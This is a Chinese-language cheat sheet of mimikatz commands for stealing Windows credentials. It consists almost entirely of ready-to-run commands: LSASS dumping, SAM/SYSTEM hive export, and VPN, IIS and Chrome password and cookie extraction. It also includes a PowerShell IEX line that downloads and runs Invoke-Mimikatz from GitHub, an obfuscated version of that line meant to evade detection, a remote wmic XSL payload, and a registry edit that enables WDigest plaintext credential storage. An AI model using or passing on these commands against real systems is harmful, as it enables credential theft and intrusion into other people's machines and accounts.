mimikatz使用
mimikatz使用
一、获取密码
privilege::debug``sekurlsa::logonpasswords``mimikatz.exe ``"sekurlsa::debug"` `"sekurlsa::logonPasswords full"` `>>1.txt ``exit
一般我会使用bat
@echo off
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>C:\programdata\1.txt
二、powershell获取密码#
powershell IEX (New-Object Net.WebClient).DownloadString(``'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'``); Invoke-Mimikatz -DumpCreds
三、混淆#
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttps://raw.gith'+'ubus'+'erco'+'ntent.com/matt'+'ife'+'stati'+'on/Power'+'Sploit/ma'+'ster/Exfil'+'tration/Invok'+'e-Mi'+'mikatz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
四、wmic获取密码#
wmic os get /format:"https://gist.githubusercontent.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl"
五、procdump离线获取密码#
procdump64.exe -accepteula -ma lsass.exe 1.dmp
mimikatz.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
六、使用注册表来离线导出Hash#
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit
七、vpn密码获取#
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit vpn
mimikatz.exe "sekurlsa::minidump 1.dmp" token::elevate lsadump::sam lsadump::secrets exit vpn
八、读取IIS7配置文件密码#
mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
九、获取浏览器的密码和cookie信息#
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit # 读chrome密码
十、2012服务器 mimikatz获取密码#
修改注册表
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
服务器锁屏
rundll32.exe user32.dll,LockWorkStation